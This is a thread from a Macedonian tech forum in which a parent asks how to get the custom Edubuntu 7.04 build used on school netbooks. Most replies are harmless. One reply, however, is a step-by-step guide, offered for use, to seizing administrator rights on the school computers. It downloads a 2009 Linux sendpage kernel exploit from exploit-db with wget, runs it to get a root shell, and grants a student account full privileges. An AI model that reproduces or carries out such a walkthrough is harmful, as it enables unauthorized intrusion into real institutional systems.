• Важно
    Имате проблем со најава или регистрација на it.mk?
    Побарајте го решението на вашиот проблем ТУКА!

Edubuntu од школските нетбуци

marv

Unstoppable
5 октомври 2007
4.133
3.590
Здраво,

Сакам на ќерка ми (2одд) да и ставам дома во ВМ да вежба тоа убунту/едубунту што го имаат у школо на тие едни мали нетбуци.
Е сега ја има ли некаде баш таа верзија на едубунту која ја користат, со сите тие македоски програмчиња и слично ....
Ја прашав наставничката ама појма нема, а и не смеела :D да ми даде да ѕирнам у компјутерот кај неа бар да видам што верзија на едубунту користат и кои програмчиња.

Ај ако има некој искуство нека пише.
 

delix

Intern
7 април 2007
702
23
mislam deka e edubuntu 7.04, a za toa deka ne smeela profesorkata da ti dade da dzirnes mislam deka nema veza, softverot e sloboden i moze koj saka da go koristi i moze slobodno da se kopira,
no bidejki profesorkata najverojatno nema pojma okolu kompjuteri pobaraj telefonski broj od covekot zadolzen za odrzuvanje na kompjuterite toj mora da ima cd so celiot softver i ke moze nego da go zamolis za kopija, ako rece deka ne moze kazi mu da ne trese gluposti
 

macko

Intern
12 февруари 2011
14
0
Тоа е едубунту 7.04 ама не е иста со таа што може да се најде на интернет, верзијата што е на школските компјутери е правена посебно, ама е направена со многу недостатоци.. Таа верзија ја имаат администраторите во училиштата
 

marv

Unstoppable
5 октомври 2007
4.133
3.590
Каква сака нека е саката несаката, баш ми е гајле. Навикната е ќерка ми на тоа и ме удави.

Никој ли луѓе на форумов ја нема ???
 

krema

Epic
24 јуни 2009
13.296
12.893
youtu.be
со тој линк ке го однесе право накај Edubuntu 10.10 (Maverick Meerkat). не можам да разберам зошто токму 7.04 !?
Единствено верзијата што се бара може да се добие од администраторите кој што ги одржуваат школските компјутери !

поздрав и со срека
 

darefremov

Intern
7 март 2011
30
1
7.04 осакатена верзија без никакви привилегии :ua:

Мислиш дека немаш никакви Привилегии, за инсталирање менаџирање ова она? - За админ збореш? Еве ти шо треба да направеш за да имаш админ у школото:

Ова ми е од кнајдовски на мкдд форумот:
Прво се логираме како ucenik35 (рандом јузер) и отвораме Терминал

11297246706.png


Наредно што треба да направиме е да напишиме: cd /var/tmp и ке ни се појави ова како на сликата
21297246772.png


Сега треба да го преземиме експлоитот со командата: wget http://exploit-db.com/sploits/2009-linux-sendpage3.tar.gz
31297246862.png

Сега чекаме додека експлоитот целосно не се преземи. Откако ке се преземи целосно треба да ви се појави ова
51297246924.png

Експлоитот е симнат и сега треба да се отпакува со командата:
tar -zxvf 2009-linux-sendpage3.tar.gz
и откако ке се отпакува пишуваме: cd linux-sendpage3
треба да се појави ова
61297246974.png

Откако ке се отпакува целосно, пишуваме:
chmod +x *
71297246973.png

Пишуваме: ./run и ке ви се појави ова:
81297247028.png

Пишуваме: bash
91297247042.png

Ако се си направил како што треба, од левата страна ке ти пишува [email protected] (како на сликата) и сега впишуваме: users-admin
111297247101.png

Треба да се отвори овој прозорец
121297247164.png

Сега го бараме корисникот (ucenikXX) на кој што сакаме да му дадеме админ
121297247164.png

Во овој туторијал јас давам админ на ucenik35, што значи него ог одбирам и одам во Параметри
131297247199.png

Ги чекираме сите привилегии и имаме админ
1.png

141297247219.png

Кликаме во ред и треба повторно да се логираш за да можеш да го користиш админот
 

krema

Epic
24 јуни 2009
13.296
12.893
youtu.be
fatal1ty_ точно така, човекот ја бара верзијата што ја има по школските компјутери, не стануваше збор како да се дојде до админ.

поздрав
 

Нови мислења

Последни Теми

Онлајн членови

Статистика

Теми
44.303
Мислења
892.271
Членови
31.481
Огласи
19
Најнов член
Dan1el
На врв Дно